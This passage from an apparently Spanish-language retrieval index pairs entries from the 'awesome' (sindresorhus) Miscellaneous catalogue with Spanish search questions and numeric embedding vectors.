Bitcoin. Scientific Computing β€” Solving complex scientific problems using computers. Amazon Sellers. Agriculture β€” Open source technology for farming and gardening. Product Design β€” Design a product from the initial concept to production. Prisma β€” Turn your database into a GraphQL API. Software Architecture β€” The discipline of designing and building software. Connectivity Data and Reports β€” Better understand who has access to telecommunication and internet infrastructure and on what terms. Stacks β€” Tech stacks for building different apps and features. Cytodata β€” Image-based profiling of biological phenotypes for computational biologists. IRC β€” Open source messaging protocol. Advertising β€” Programmatic media and ad tech for websites. Earth β€” Find ways to resolve the climate crisis. Naming β€” Guides for naming things in computer science. Web Archiving β€” An effort to preserve the Web for future generations. WP-CLI β€” Command-line interface for WordPress.", "indexar": "como puedo crear una interfaz de consulta para mi base de datos usando graphql", "v": [-0.05493, 0.05379, -0.09457, -0.189, 0.06914, -0.21049, -0.0265, 0.06372, -0.08503, -0.0137, -0.09467, -0.19286, -0.11923, -0.00915, -0.05995, -0.03025, 0.02308, -0.09954, -0.05557, -0.0962, 0.01351, -0.01658, -0.0599, -0.10307, -0.23843, -0.0095, 0.01777, -0.06385, -0.05303, 0.00925, -0.03603, -0.10636, -0.03479, 0.00713, -0.09613, -0.02278, 0.06314, 0.09146, 0.0017, -0.10293, -0.03758, -0.05681, -0.12083, 0.08288, 0.1117, 0.0162, -0.07697, -0.03743, -0.00843, 0.00577, -0.09161, -0.09618, -0.16536, 0.01825, -0.08341, -0.08031, 0.14893, -0.1463, 0.04821, 0.11866, -0.06423, -0.03766, -0.02015, 0.0099, 0.00758, -0.05153, 0.03373, 0.03901, 0.01861, 0.11589, 0.0246, 0.10072, -0.09439, -0.05262, 0.1398, -0.01619, 0.06151, -0.08425, 0.08519, 0.02997, -0.07564, 0.01178, -0.0974, -0.01458, -0.05068, 0.02222, 0.0061, 0.03358, -0.06787, 0.03928, -0.00796, 0.01394, -0.03007, -0.03485, 0.00575, 0.02518, -0.04689, -0.06286, -0.00474, -0.08414, 0.01589, 0.02164, -0.07728, 0.09172, 0.07516, -0.01586, 0.09093, 0.02927, -0.11402, 0.02226, 0.08132, -0.01539, -0.03048, -0.01679, 0.04014, -0.01134, 0.02349, 0.07062, -0.0821, -0.00914, 0.05979, 0.00828, -0.00236, -0.01812, -0.0863, -0.04471, -0.04414, 0.11928, -0.01944, 0.1091, -0.01915, 0.03449, -0.11386, -0.10105, 0.04375, 0.08615, -0.04149, -0.07276, 0.05149, -0.02655, -0.04892, 0.05811, -0.02394, 0.02138, 0.02579, 0.04214, 0.01639, 0.02243, -0.08238, -0.00429, -0.02116, -0.00675, 0.05339, -0.00842, -0.0791, -0.01625, 0.05349, -0.01326, -0.04965, -0.01973, 0.03291, 0.07853, -0.02491, 0.06787, 0.01352, -0.06948, -0.01842, 0.02967, 0.05347, 0.05694, -0.01081, 0.04149, 0.0751, -0.12332, 0.09055, 0.03677, -0.07186, -0.04131, -0.07333, -0.06108, 0.06807, -0.04052, -0.00281, -0.02005, -0.04705, -0.02689, 0.05255, -0.01775, 0.01281, -0.03841, -0.05817, 0.11261, 0.04442, 0.02328, 0.0844, -0.04592, 0.05273, 0.00174, -0.02368, -0.02393, 0.00234, 0.0342, -0.04152, -0.03942, 0.01987, 0.02089, 0.01441, 0.00576, 0.03535, -0.07157, 0.01758, 0.01781, 0.0116, 0.00385, -0.01179, -0.02312, 0.0341, 0.02178, 0.0715, -0.07981, -0.06038, 0.05734, -0.0094, -0.00836, -0.03183, -0.01073, 0.00592, -0.00977, -0.02581, -0.00409, 0.0485, -0.02104, 0.01213, -0.01072, 0.01333, -0.01175, -0.03759, -0.05255, 0.03555, -0.06104, 0.05788, 0.03846, -0.04843, -0.02285, 0.0269, -0.0272, -0.03884, 0.00985, -0.02145, -0.10975, -0.00938, -0.02759, 0.07054, -0.00698, -0.00346, 0.01432]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Credit Modeling β€” Methods for classifying credit applicants into risk classes. Ansible β€” A Python-based, open-source IT configuration management and automation platform. Biological Visualizations β€” Interactive visualization of biological data on the web. QR Code β€” A type of matrix barcode that can be used to store and share a small amount of information. Veganism β€” Making the plant-based lifestyle easy and accessible. Translations β€” The transfer of the meaning of a text from one language to another. Scriptable β€” An iOS app for automation in JavaScript. WebXR β€” Enables immersive virtual reality and augmented reality content on the web. Computational Geometry β€” Computational approaches for problems in geometry. OpenStreetMap β€” An open data mapping project utilized by many apps and devices. Computational Biology β€” Computational approaches applied to problems in biology. Read the Docs β€” Example documentation projects to inspire and help bootstrap new documentation projects.", "indexar": "que programa sirve para modelar el riesgo crediticio y clasificar a los solicitantes?", "v": [0.19648, 0.0111, -0.02688, -0.06801, 0.23224, -0.22979, 0.11452, -0.00334, -0.10996, -0.08191, 0.05827, -0.10925, 0.00351, -0.10915, 0.06055, -0.01444, -0.02499, 0.0031, -0.00382, -0.04595, 0.11843, -0.13473, 0.01531, -0.02393, -0.06944, 0.06594, 0.03624, -0.13016, -0.06912, 0.04807, 0.0425, -0.002, 0.14633, -0.07087, 0.06697, 0.05599, -0.05914, -0.07449, -0.15733, 0.03418, 0.13867, 0.03362, -0.0394, -0.08885, 0.09352, -0.07002, -0.0165, 0.07115, 0.0273, -0.03125, 0.07694, 0.01644, -0.06244, -0.01491, 0.06796, 0.0777, 0.01283, -0.02409, -0.08281, -0.03773, 0.14269, 0.01996, 0.02002, -0.01238, -0.04458, -0.00569, 0.03001, 0.03307, -0.0576, -0.04166, -0.09072, -0.03692, 0.07566, -0.00232, 0.01329, -0.01377, -0.01206, 0.03902, 0.09418, -0.09625, 0.04788, -0.00049, -0.02513, 0.05977, -0.09058, 0.03245, 0.09731, 0.0224, 0.00525, -0.03992, 0.0518, 0.06378, -0.03106, 0.03798, 0.01069, -0.07499, 0.11122, 0.07014, 0.07535, 0.01667, 0.02495, -0.0533, -0.07693, 0.04865, -0.03723, 0.09029, 0.1214, -0.03107, -0.0591, -0.01511, -0.02196, 0.01837, -0.05703, -0.07581, -0.0121, 0.00749, -0.04475, -0.00359, 0.07877, -0.06219, -0.03649, 0.05028, -0.04566, 0.03184, -0.002, -0.03014, -0.05162, 0.04668, 0.00937, 0.10846, -0.05925, 0.05814, -0.07661, 0.00279, -0.04005, -0.04009, 0.04281, -0.06962, -0.01284, -0.05628, 0.08947, 0.10375, 0.05956, -0.05051, -0.03264, 0.01446, 0.0764, -0.09855, -0.03062, -0.01721, -0.03117, 0.04461, -0.06931, 0.05807, -0.06931, -0.00459, 0.03966, -0.02407, 0.02578, 0.05559, 0.00731, 0.00237, 0.01425, -0.07704, 0.04739, 0.00582, 0.03773, -0.08776, 0.06873, 0.0129, 0.06036, -0.04865, -0.00375, 0.01431, 0.03461, -0.00742, -0.02945, -0.07334, 0.02451, 0.01097, -0.14248, 0.02641, 0.01109, 0.00298, -0.00297, -0.00342, 0.00903, -0.02192, 0.08044, 0.04097, 0.00036, 0.08351, -0.09888, 0.01739, -0.01624, 0.01914, -0.00098, -0.0102, 0.06109, -0.03503, -0.09746, -0.04387, -0.07637, -0.03526, 0.08397, 0.08874, -0.02425, 0.0988, 0.03277, 0.12589, -0.00778, -0.03521, 0.14784, -0.00312, -0.02335, -0.04715, -0.02625, 0.0697, 0.00569, 0.039, -0.02858, -0.00649, 0.06078, 0.05745, 0.02702, -0.03016, 0.01857, -0.02055, 0.05243, 0.03957, -0.01177, -0.00329, -0.03453, -0.08559, 0.0863, 0.02509, 0.06345, -0.05424, -0.00528, -0.05575, 0.00031, 0.04315, -0.02325, -0.06355, 0.01444, 0.01001, -0.08007, -0.00688, 0.05821, -0.02435, 6e-05, 0.06575, 0.03608, -0.04058, 0.06622, -0.03805]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Credit Modeling β€” Methods for classifying credit applicants into risk classes. Ansible β€” A Python-based, open-source IT configuration management and automation platform. Biological Visualizations β€” Interactive visualization of biological data on the web. QR Code β€” A type of matrix barcode that can be used to store and share a small amount of information. Veganism β€” Making the plant-based lifestyle easy and accessible. Translations β€” The transfer of the meaning of a text from one language to another. Scriptable β€” An iOS app for automation in JavaScript. WebXR β€” Enables immersive virtual reality and augmented reality content on the web. Computational Geometry β€” Computational approaches for problems in geometry. OpenStreetMap β€” An open data mapping project utilized by many apps and devices. Computational Biology β€” Computational approaches applied to problems in biology. Read the Docs β€” Example documentation projects to inspire and help bootstrap new documentation projects.", "indexar": "con quΓ© puedo crear visualizaciones interactivas de datos biolΓ³gicos en la web?", "v": [0.11163, 0.08077, -0.1091, 0.07627, 0.11608, -0.07292, -0.06465, -0.07804, 0.03916, -0.15533, 0.1243, -0.20309, -0.08342, 0.028, 0.05552, 0.07894, 0.08301, -0.15205, -0.0341, -0.07311, 0.02395, -0.03078, -0.09121, -0.00794, -0.05541, -0.06939, 0.00368, -0.02878, -0.01648, 0.17313, -0.0113, 0.04497, -0.00841, 0.05469, -0.06386, 0.00081, -0.00487, 0.08705, -0.02195, -0.11998, -0.10008, 0.00642, -0.05858, 0.09812, 0.00944, 0.08218, -0.07672, -0.01339, -0.06892, -0.02022, -0.01655, 0.08956, -0.1712, -0.03669, -0.00067, -0.15059, 0.10986, -0.22003, 0.0944, -0.01146, -0.02979, 0.16749, 0.0555, -0.01714, 0.01525, -0.02363, 0.0216, 6e-05, -0.0292, 0.13681, 0.05191, -0.04631, 0.04373, -0.01579, 0.1276, 0.06722, 0.00069, 0.02639, 0.05318, -0.00724, -0.02624, 0.02087, -0.0286, 0.0212, 0.009, 0.01752, -0.04439, -0.01101, -0.04996, -0.1742, 0.09509, 0.0108, 0.01968, -0.02165, -0.00063, 0.04888, 0.00426, -0.03403, -0.04378, 0.02792, -0.11319, 0.01124, -0.13739, 0.07003, 0.0854, 0.01111, 0.05364, 0.03624, -0.09685, -0.00096, -0.02359, -0.04524, -0.06148, -0.06197, -0.00978, 0.08338, -0.00337, 0.0407, 0.01364, -0.00895, -0.01218, 0.01268, 0.02593, -0.02201, -0.02921, -0.01765, -0.0141, 0.04865, 0.0083, 0.09146, -0.04581, -0.03047, -0.01868, -0.11723, 0.05121, 0.03499, -0.06371, -0.07517, 0.00783, -0.00146, 0.03439, 0.06439, -0.01871, 0.01054, -0.03577, -0.03001, -0.01245, -0.00625, -0.12768, 0.0555, -0.02396, 0.01131, 0.02319, 0.02486, -0.10772, 0.09183, -0.04738, -0.05418, -0.02544, -0.00801, -0.05727, 0.07645, -0.03555, 0.08496, -0.03837, -0.02591, -0.12288, -0.03088, 0.01369, 0.01793, -0.03348, 0.02922, -0.00065, -0.14954, 0.02474, 0.02538, -0.06046, -0.05816, 0.02242, -0.10107, -0.0269, -0.01522, -0.03211, -0.038, -0.01967, -0.05805, -0.0048, -0.02154, -0.03246, 0.04236, 0.0044, 0.12406, 0.01033, 0.0608, 0.08878, -0.05864, 0.0052, 0.02694, -0.00413, -0.05745, 0.0293, 0.02357, 0.00179, -0.01235, -0.01587, 0.09034, 0.00254, 0.02869, -0.00817, -0.00987, -0.02056, -0.06348, 0.092, -0.04516, -0.02238, -0.04551, 0.06456, -0.03882, -0.01978, 0.01492, 0.05612, 0.05604, 0.04277, 0.00896, 0.01014, -0.01037, 0.04554, -0.00942, 0.04564, -0.00582, -0.07036, -0.0136, 0.02384, 0.01475, 0.038, -0.00378, -0.03637, -0.05454, -0.05843, -0.03142, 0.02233, 0.06411, -0.04839, -0.04308, 0.03679, -0.07118, -0.0911, 0.02451, 0.00082, -0.09173, -0.05226, -0.06269, -0.00025, -0.03701, -0.03576, -8e-05]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Credit Modeling β€” Methods for classifying credit applicants into risk classes. Ansible β€” A Python-based, open-source IT configuration management and automation platform. Biological Visualizations β€” Interactive visualization of biological data on the web. QR Code β€” A type of matrix barcode that can be used to store and share a small amount of information. Veganism β€” Making the plant-based lifestyle easy and accessible. Translations β€” The transfer of the meaning of a text from one language to another. Scriptable β€” An iOS app for automation in JavaScript. WebXR β€” Enables immersive virtual reality and augmented reality content on the web. Computational Geometry β€” Computational approaches for problems in geometry. OpenStreetMap β€” An open data mapping project utilized by many apps and devices. Computational Biology β€” Computational approaches applied to problems in biology. Read the Docs β€” Example documentation projects to inspire and help bootstrap new documentation projects.", "indexar": "cual es una alternativa libre para gestionar la automatizaciΓ³n de configuraciones IT con Python?", "v": [-0.05882, 0.03097, -0.12409, -0.2247, 0.09768, -0.19023, -0.04932, -0.03827, -0.25572, 0.07904, 0.02475, -0.07474, 0.05204, 0.08513, -0.01219, -0.0245, 0.02529, -0.19484, 0.07962, -0.00846, -0.10751, 0.06426, -0.04597, -0.11793, 0.01125, 0.05999, 0.02807, 0.01106, -0.12427, 0.02797, -0.00266, 0.01905, 0.05119, 0.04351, -0.06393, -0.05956, 0.08906, 0.18102, 0.05908, -0.02076, -0.07284, -0.07143, -0.04374, 0.18558, 0.05732, -0.0321, 0.06558, -0.05318, 0.03175, 0.0263, -0.09602, -0.10346, -0.00808, -0.01848, 0.09496, -0.03389, 0.13226, -0.13446, 0.06553, -0.06466, -0.11429, 0.02721, -0.03917, 0.06361, -0.00461, 0.09416, -0.05795, -0.0488, -0.06326, 0.17804, 0.01384, 0.00027, -0.08554, -0.01524, 0.09509, 0.05884, -0.09456, 0.02651, 0.03354, 0.06213, -0.04582, -0.08931, -0.09355, 0.02067, -0.06704, -0.10138, 0.03047, -0.07123, 0.0459, 0.05776, 0.01506, -0.00807, 0.05212, -0.01676, 0.02625, 0.07206, 0.0885, 0.00931, -0.05155, 0.0457, -0.00833, 0.02585, -0.10375, 0.13498, -0.04045, 0.06213, 0.03531, 0.00683, -0.02159, -0.03635, 0.04353, 0.01958, 0.00485, 0.02293, -0.064, -0.08129, 0.03849, 0.04404, 0.00599, 0.01896, -0.02584, 0.02057, 0.01776, -0.00388, 0.03919, 0.0636, 0.07792, 0.12035, -0.02971, -0.02152, 0.0033, -0.08547, -0.05562, -0.06295, -0.11145, 0.08764, 0.04395, -0.06841, -0.00262, -0.07303, -0.09335, 0.07564, 0.02506, 0.02676, 0.12703, -0.05097, 0.0271, -0.03416, 0.00124, 0.01274, 0.02457, -0.01252, 0.03663, 0.05864, -0.10908, 0.03298, -0.08273, -0.00941, -0.06063, 0.00944, 0.0013, -0.0404, -0.00729, -0.03621, 0.0556, -0.02074, -0.00239, 0.04929, -0.00788, 0.01666, -0.01393, 0.03274, 0.01754, -0.03713, 0.01363, -0.11074, 0.01645, -0.08713, 0.01951, 0.00273, 0.00937, -0.0397, -0.02611, -0.02726, 0.04756, -0.01929, 0.00643, 0.015, 0.00034, 0.02804, -0.01637, 0.05227, -0.06719, -0.05708, 0.04405, -0.00162, -0.0059, -0.03219, -0.01486, 0.00494, -0.01835, 0.00488, -0.0218, -0.0236, -0.03843, 0.08338, -0.05471, 0.02591, 0.03235, -0.01924, 0.02839, 0.03335, 0.04968, -0.00073, -0.02387, -0.02859, -0.00148, 0.03289, 0.03809, -0.05081, -0.02801, -0.03439, 0.0588, 0.0193, -0.02767, -0.01525, 0.04712, 0.04875, 0.00951, -0.03227, -0.06009, 0.00281, 0.00186, 0.03899, -0.02512, 0.01157, 0.02584, -0.01137, -0.01574, -0.00871, 0.0181, 0.08333, 0.00152, -0.06895, -0.03883, -0.0149, -0.10122, -0.01865, -0.05357, -0.02959, -0.03784, 0.01637, -0.0299, -0.01971, -0.03223, 0.04974]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Quarto β€” Scientific and technical open-source publishing system built on Pandoc. Biological Image Analysis β€” Interpreting biological phenomena using images. ChatGPT β€” Artificial intelligence chatbot developed by OpenAI. Whisper β€” Open-source AI-powered speech recognition system developed by OpenAI. Stock Trading β€” Purchase and sale of equities of publicly traded companies to generate profits. Steam Deck β€” A handheld gaming computer developed by Valve. Astrophotography β€” Photography of astronomical objects, celestial events, or areas of the night sky. HPC β€” High Performance Computing. Geocaching β€” Outdoor treasure-hunting activity that uses GPS-enabled devices. Regex β€” Specialized language for matching patterns in text. Event-Driven Architecture β€” A software architecture approach where services collaborate by publishing and subscribing to events. Permacomputing β€” Resilient and regenerative computing practices inspired by permaculture.", "indexar": "quΓ© programa sirve para publicar documentos cientΓ­ficos de forma abierta?", "v": [-0.08359, 0.06628, -0.09202, -0.19497, 0.10115, -0.23676, 0.03156, -0.12436, -0.0892, -0.151, -0.04151, -0.13737, 0.02086, -0.11681, 0.05109, -0.03379, 0.16773, -0.10533, 0.07083, 0.00049, -0.05153, -0.03602, -0.04704, -0.10896, -0.0583, -0.07421, 0.01232, -0.08049, 0.0591, 0.07026, 0.03097, 0.08158, -0.01439, -0.01259, -0.0899, 0.11664, 0.01498, -0.06761, -0.07717, 0.11601, -0.03939, -0.05152, -0.09434, 0.0497, -0.06426, 0.04209, 0.00504, 0.03294, -0.046, 0.00061, -0.05682, -0.04786, -0.00549, 0.09667, -0.05789, -0.03362, -0.00375, -0.08237, -0.08213, 0.01261, -0.03648, 0.09972, 0.01056, -0.07618, 0.004, -0.1211, 0.09695, 0.02801, -0.0875, 0.02565, -0.04795, -0.08045, 0.11523, -0.0373, -0.09978, 0.03838, -0.20503, -0.01043, -0.00735, -0.00303, -0.08037, 0.07265, -0.00987, 0.01366, 0.00678, -0.05177, 0.06601, 0.00695, -0.03608, -0.01459, -0.00185, 0.12603, -0.01561, 0.12667, 0.0564, -0.06278, 0.06547, -0.01645, -0.00646, 0.0722, -0.044, 0.02812, 0.01921, 0.03505, -0.1254, 0.03384, -0.01653, -0.09088, -0.03681, 0.08385, 0.02197, 0.00229, -0.05887, 0.04852, -0.06305, 0.01357, 0.01398, 0.00366, -0.02285, -0.06461, -0.07506, 0.05133, -0.07324, 0.06601, 0.11856, -0.03993, 0.01206, 0.02416, -0.00171, 0.10633, 0.01674, 0.00303, -0.06856, 0.02544, -0.03296, -0.09181, 0.05362, -0.10734, -0.05177, -0.05275, 0.06936, -0.01502, -0.0423, -0.06581, -0.03028, -0.06911, -0.01224, -0.00299, -0.06266, -0.03604, 0.01426, -0.01935, -0.02172, 0.05948, -0.08202, -0.05822, 0.02169, 0.00045, -0.08821, -0.01532, -0.06269, 0.10078, -0.05177, -0.01919, 0.09818, -0.03149, -0.0124, -0.01608, 0.04215, 0.06003, 0.01146, 0.05519, 0.0248, -0.11865, 0.05248, -0.03387, -0.054, -0.00231, 0.0305, -0.04692, -0.07712, 0.05083, 0.00834, 0.02282, -0.06197, -0.00917, 0.07787, -0.01694, 0.04221, -0.04041, 0.01365, 0.01703, -0.00084, -0.00764, 0.01308, -0.11144, -0.00951, -0.02989, 0.07825, 0.02041, -0.03384, -0.02179, -0.0015, 0.01508, -0.02292, 0.06877, -0.0532, 0.00504, -0.01982, 0.08177, -0.01733, -0.08059, 0.07436, 0.05145, -0.09496, -0.01876, 0.00462, 0.03068, 0.02646, 0.05044, 0.0657, -0.05283, 0.03743, -0.01838, 0.08809, -0.05803, 0.06864, 0.00136, 0.04679, -0.01348, 0.01024, 0.00383, 0.02289, 0.00761, 0.03225, 0.03014, 0.00169, -0.04521, -0.02613, -0.06187, -0.02055, 0.07537, 0.00876, -0.04138, 0.00487, 0.01718, -0.02151, 0.03222, 0.05685, -0.04532, -0.05838, 0.03616, 0.0443, -0.0594, 0.05775, 0.01524]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Quarto β€” Scientific and technical open-source publishing system built on Pandoc. Biological Image Analysis β€” Interpreting biological phenomena using images. ChatGPT β€” Artificial intelligence chatbot developed by OpenAI. Whisper β€” Open-source AI-powered speech recognition system developed by OpenAI. Stock Trading β€” Purchase and sale of equities of publicly traded companies to generate profits. Steam Deck β€” A handheld gaming computer developed by Valve. Astrophotography β€” Photography of astronomical objects, celestial events, or areas of the night sky. HPC β€” High Performance Computing. Geocaching β€” Outdoor treasure-hunting activity that uses GPS-enabled devices. Regex β€” Specialized language for matching patterns in text. Event-Driven Architecture β€” A software architecture approach where services collaborate by publishing and subscribing to events. Permacomputing β€” Resilient and regenerative computing practices inspired by permaculture.", "indexar": "con quΓ© puedo analizar imΓ‘genes biolΓ³gicas automΓ‘ticamente?", "v": [0.1366, 0.23087, 0.01283, 0.04504, -0.00863, -0.02489, -0.01234, -0.08579, -0.17453, -0.1188, 0.091, -0.11057, -0.08641, 0.04371, 0.09972, -0.0301, 0.02884, -0.12438, 0.01263, -0.00569, 0.13698, -0.06733, -0.14845, -0.01513, 0.04394, -0.02973, 0.02607, 0.03495, -0.03933, 0.02273, -0.02015, 0.11208, 0.12045, -0.01662, -0.09784, 0.04351, -0.02538, 0.00756, -0.05579, -0.04409, -0.05465, -0.0182, -0.02657, 0.04276, -0.02829, 0.02406, -0.0914, -0.04092, -0.03373, -0.10308, 0.06768, 0.05239, -0.04187, -0.01318, -0.06444, -0.0849, 0.1264, -0.10215, 0.09931, -0.02922, 0.08095, 0.1933, 0.06797, 0.10235, 0.00653, 0.05724, 0.08973, 0.0039, 0.00169, 0.04613, 0.0289, -0.00491, 0.01805, 0.01223, 0.01186, 0.06886, -0.03353, 0.07529, 0.04575, 0.02362, 0.0197, 0.00864, -0.09199, 0.10181, -0.02942, -0.03164, -0.12128, 0.02632, 0.03982, -0.11899, 0.00144, -0.06591, 0.09725, 0.07163, 0.05175, 0.0098, 0.03471, -0.04009, -0.0101, 0.07065, -0.0026, -0.08891, -0.09347, 0.05772, 0.03937, 0.03143, 0.02942, -0.09875, -0.09724, -0.04508, -0.05224, 0.03286, -0.04723, -0.1284, -0.05449, 0.00564, -0.04981, 0.01618, -0.03587, 0.00472, -0.04629, 0.04435, 0.02229, -0.00531, -0.03409, -0.06527, 0.03353, 0.07156, -0.01955, 0.03943, -0.04193, 0.07833, -0.06542, -0.12009, -0.07235, 0.02517, 0.00863, -0.06534, -0.10735, -0.05405, -0.00894, 0.10255, 0.00824, -0.06091, 0.01761, 0.01017, -0.08038, -0.11097, -0.08956, 0.0404, 0.05071, 0.01873, 0.07298, 0.03082, 0.04896, 0.09029, -0.07892, -0.08024, 0.01931, -0.02025, -0.02417, 0.0368, 0.03846, 0.07656, -0.0235, -0.01951, -0.05442, -0.11173, -0.03707, 0.00831, 0.00832, -0.0119, -0.09232, -0.08704, 0.0094, 0.02793, 0.03511, -0.07219, 0.0182, -0.02263, -0.03926, 0.04403, -0.01721, -0.05567, 0.00859, 0.02285, -0.0392, 0.02061, 0.0194, 0.06724, 0.02472, 0.0405, -0.03061, 0.04113, 0.07393, -0.0327, -0.04523, 0.03301, 0.00374, -0.04937, -0.02583, 0.01436, 0.00553, 0.03687, 0.01885, 0.03308, -0.02139, 0.07956, -0.03204, -0.00836, -0.09459, 0.01374, 0.07805, -0.11027, -0.04547, -0.00695, 0.00633, -0.05834, -0.03421, 0.00627, 0.06505, 0.08279, 0.13679, 0.07065, 0.01035, 0.0655, -0.017, 0.04928, 0.06721, -0.01038, -0.04751, 0.10978, -0.04982, 0.01529, 0.05759, 0.01267, -0.00816, -0.05136, -0.03018, -0.05268, 0.06333, 0.01599, -0.07212, -0.03077, -0.02357, -0.07241, -0.06105, -0.02582, 0.05661, -0.09276, -0.00567, 0.04248, -0.02213, -0.05054, 0.03687, -0.02844]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Quarto β€” Scientific and technical open-source publishing system built on Pandoc. Biological Image Analysis β€” Interpreting biological phenomena using images. ChatGPT β€” Artificial intelligence chatbot developed by OpenAI. Whisper β€” Open-source AI-powered speech recognition system developed by OpenAI. Stock Trading β€” Purchase and sale of equities of publicly traded companies to generate profits. Steam Deck β€” A handheld gaming computer developed by Valve. Astrophotography β€” Photography of astronomical objects, celestial events, or areas of the night sky. HPC β€” High Performance Computing. Geocaching β€” Outdoor treasure-hunting activity that uses GPS-enabled devices. Regex β€” Specialized language for matching patterns in text. Event-Driven Architecture β€” A software architecture approach where services collaborate by publishing and subscribing to events. Permacomputing β€” Resilient and regenerative computing practices inspired by permaculture.", "indexar": "cuΓ‘l es una alternativa libre a ChatGPT para generar textos?", "v": [-0.10529, 0.05747, -0.01253, -0.03044, -0.01048, -0.07607, 0.06257, -0.0359, -0.03358, 0.04309, -0.06811, 0.00571, -0.04594, 0.14572, 0.07975, -0.02145, 0.02864, -0.12679, 0.14549, -0.06467, -0.08562, -0.08308, 0.03918, -0.1985, -0.12655, -0.08759, 0.04513, 0.0117, 0.03377, 0.1919, 0.03997, -0.02938, -0.01342, -0.04144, -0.04855, -0.01972, 0.20106, 0.04757, 0.0808, 0.01862, 0.06991, 0.00624, -0.05068, 0.15247, 0.09915, -0.1071, -0.0471, -0.01985, -0.06116, -0.00665, -0.05709, 0.00883, -0.02621, 0.06335, -0.03071, 0.07399, 0.16457, -0.17758, -0.03698, -0.14858, 0.01318, 0.0689, 0.03365, -0.05803, 0.00524, 0.06312, -0.10663, 0.0633, -0.06842, 0.14198, 0.01224, -0.0336, 0.03953, 0.01551, -0.02939, 0.10372, -0.21148, -0.0169, -0.02539, 0.12496, 0.09091, -0.11094, -0.01878, 0.07425, 0.00353, -0.05967, 0.04367, -0.08957, 0.0024, -0.01227, 0.10485, -0.00958, 0.05173, 0.10107, -0.08792, -0.1135, -0.0098, -0.02146, 0.02147, 0.1066, 0.03879, -0.00452, -0.10624, 0.00887, 0.00206, -0.06678, -0.02962, -0.02055, -0.07354, -0.05271, 0.09113, 0.02669, -0.00919, 0.06207, 0.00142, -0.03288, 0.00518, 0.02542, 0.03289, -0.01622, -0.05482, 0.02944, -0.08178, -0.08584, 0.02916, 0.0806, 0.0361, -0.00723, -0.0361, 0.07139, 0.01815, -0.02358, -0.08826, -0.14433, -0.07205, 0.00177, 0.09391, 0.0191, 0.01474, 0.00471, -0.00842, 0.04025, -0.05929, 0.01084, 0.05786, 0.00372, -0.02625, -0.0996, 0.03547, -0.03898, -0.05908, 0.00302, 0.03525, 0.07116, -0.06471, -0.00556, -0.02726, -0.02054, -0.08693, 0.08662, 0.03281, -0.03119, -0.06859, 0.04748, 0.04508, 0.02121, -0.04051, -0.01758, -0.01889, -0.02629, -0.02474, 0.04439, 0.11141, -0.08694, 0.06357, -0.02316, 0.00225, -0.06888, -0.06136, -0.08856, -0.03022, -0.02593, -0.09772, -0.0256, 0.00353, -0.00565, 0.02612, 0.04549, 0.00324, 0.03492, -0.09901, 0.00331, -0.04641, -0.08074, -0.01765, -0.02392, 0.01431, -0.0677, 0.00402, -0.00228, -0.04191, -0.02015, 0.03527, -0.00073, 0.01802, -0.01083, -0.06226, 0.0439, -0.00374, 0.0507, 0.06683, 0.00264, 0.05427, 0.02337, -0.03682, 0.02325, -0.00195, -0.03481, 0.01936, -0.0044, 0.04046, 0.01195, 0.00216, 0.00117, 0.01929, 0.04588, -0.00561, 0.05634, -0.03379, 0.00685, -0.02297, -0.02104, 0.02308, 0.04359, 0.02375, 0.00625, -0.00257, 0.04062, 0.01215, -0.01757, 0.02831, 0.03257, -0.01791, -0.02697, -0.05553, 0.01093, -0.09312, 0.0254, -0.0828, -0.02485, -0.0402, 0.03661, 0.03398, -0.00365, 0.01382, 0.00258]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Standards β€” Proposals and standards that define and enhance software, languages, and related technologies. Claude Code β€” Terminal-based AI coding assistant by Anthropic. Gemini CLI β€” Terminal-based AI coding assistant by Google. SAP Commerce β€” An e-commerce platform built with Java, Spring MVC, and Angular. Tech Ethics β€” Mitigating and avoiding the potential negative effects of technology on society. Copilot Agents β€” AI pair programming assistant by GitHub that provides code suggestions and completions.", "indexar": "que herramienta sirve para asistir en la programaciΓ³n desde el terminal", "v": [-0.0027, 0.10157, -0.25369, -0.28822, 0.10162, -0.14707, -0.03485, -0.01445, -0.01167, 0.0563, -0.10198, 0.02671, 0.08719, -0.05434, 0.01257, 0.11338, 0.01576, -0.07833, 0.11878, 0.08201, -0.0205, 0.15359, -0.03624, 0.05111, -0.02818, 0.04895, 0.0423, -0.10977, -0.17171, -0.06987, 0.06507, -0.0473, 0.06346, -0.12278, 0.05183, -0.1372, -0.01359, 0.06124, -0.08148, 0.07597, -0.05056, 0.02466, -0.06935, 0.0223, 0.07031, -0.01927, 0.01789, 0.06755, 0.01721, 0.02574, -0.02783, -0.045, -0.00736, 0.03983, 0.03178, -0.10719, 0.07107, -0.19564, 